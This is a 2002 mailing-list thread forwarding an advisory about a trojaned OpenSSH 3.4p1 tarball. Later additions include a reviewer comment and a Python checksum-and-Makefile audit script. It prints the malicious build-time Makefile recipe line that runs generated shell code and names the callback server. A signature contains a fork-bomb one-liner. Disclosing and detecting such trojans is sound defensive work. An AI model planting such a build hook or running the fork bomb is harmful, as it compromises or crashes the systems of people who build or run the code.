Now it's really getting bad.

1) OpenBSD.org web server cracked
2) Trojan horse built into OpenSSH

I bet Theo will deny everything.

-martin

> -----Original Message-----
> From: Mikael Olsson [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, August 01, 2002 1:21 PM
> To: [EMAIL PROTECTED]
> Subject: openssh-3.4p1.tar.gz distribution recently trojaned
> 
> 
> 
> From
> http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
> 
> ----- Forwarded message from Edwin Groothuis <[EMAIL PROTECTED]> -----
> 
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: openssh-3.4p1.tar.gz trojaned
> 
> Greetings,
> 
> Just want to inform you that the OpenSSH package on ftp.openbsd.org
> (and probably all its mirrors now) is trojaned:
> 
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
[EMAIL PROTECTED] and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &
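
Review bot: the recipe line added under `all:` executes code at build time and should not be there. It compiles bf-test.c, runs the resulting binary, writes its output to bf-test.out and runs that file with `sh` in the background, while the leading `@` keeps make from echoing the command. Nothing in a library target needs to run generated output through a shell; remove the line and check the tarball against the known-good checksum before building anything from this tree.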

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
[EMAIL PROTECTED]    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
----------------------------------------------------------------------------
PUG - Penguin User Group Wiesbaden - http://www.pug.org
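
The two checks the report above relies on (comparing the archive digest with the published MD5 values, and reading the Makefile recipes before building), as an added example that is not part of the original messages. The function names and the three heuristics are assumptions of this example, and the sample archive is constructed inline from the recipe line quoted in the report.

```python
import hashlib, io, re, tarfile

# MD5 values quoted in the advisory; MD5 only identifies these two files.
KNOWN_GOOD_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"

# Heuristics chosen for this example (assumptions, not a complete rule set).
SUSPICIOUS = [
    ("runs a file from the build directory", re.compile(r"(^|[;&|\s])\./[\w.-]+")),
    ("feeds a file to a shell", re.compile(r"(^|[;&|\s@])(sh|bash)\s+\S+")),
    ("backgrounds a command", re.compile(r"(?<!&)&\s*$")),
]

def classify_md5(hexdigest):
    """Compare a digest with the two values published in the advisory."""
    known = {KNOWN_GOOD_MD5: "known-good", TROJANED_MD5: "trojaned"}
    return known.get(hexdigest.lower(), "unknown")

def suspicious_recipes(makefile_text):
    """Return (recipe, reasons) for tab-indented recipe lines matching a heuristic."""
    hits = []
    for line in makefile_text.replace("\\\n", " ").splitlines():  # join continuations
        if line.startswith("\t"):
            reasons = [why for why, rx in SUSPICIOUS if rx.search(line.strip())]
            if reasons:
                hits.append((line.strip(), reasons))
    return hits

def audit_tarball(data):
    """Classify the archive digest and scan each Makefile(.in) without unpacking to disk."""
    digest = hashlib.md5(data, usedforsecurity=False).hexdigest()
    report = {"md5": classify_md5(digest), "recipes": []}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.endswith(("Makefile", "Makefile.in")):
                text = tar.extractfile(m).read().decode("utf-8", "replace")
                report["recipes"] += [(m.name, *h) for h in suspicious_recipes(text)]
    return report

def build_sample():
    """Constructed sample: a tiny archive carrying the recipe line quoted above."""
    body = (b"all: libopenbsd-compat.a\n"
            b"\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("openssh-3.4p1/openbsd-compat/Makefile.in")
        info.size = len(body)
        tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()
```

For a downloaded archive, pass its bytes to `audit_tarball`; a digest reported as "unknown" means only that it matches neither value from the report, so the recipe findings still need a human read.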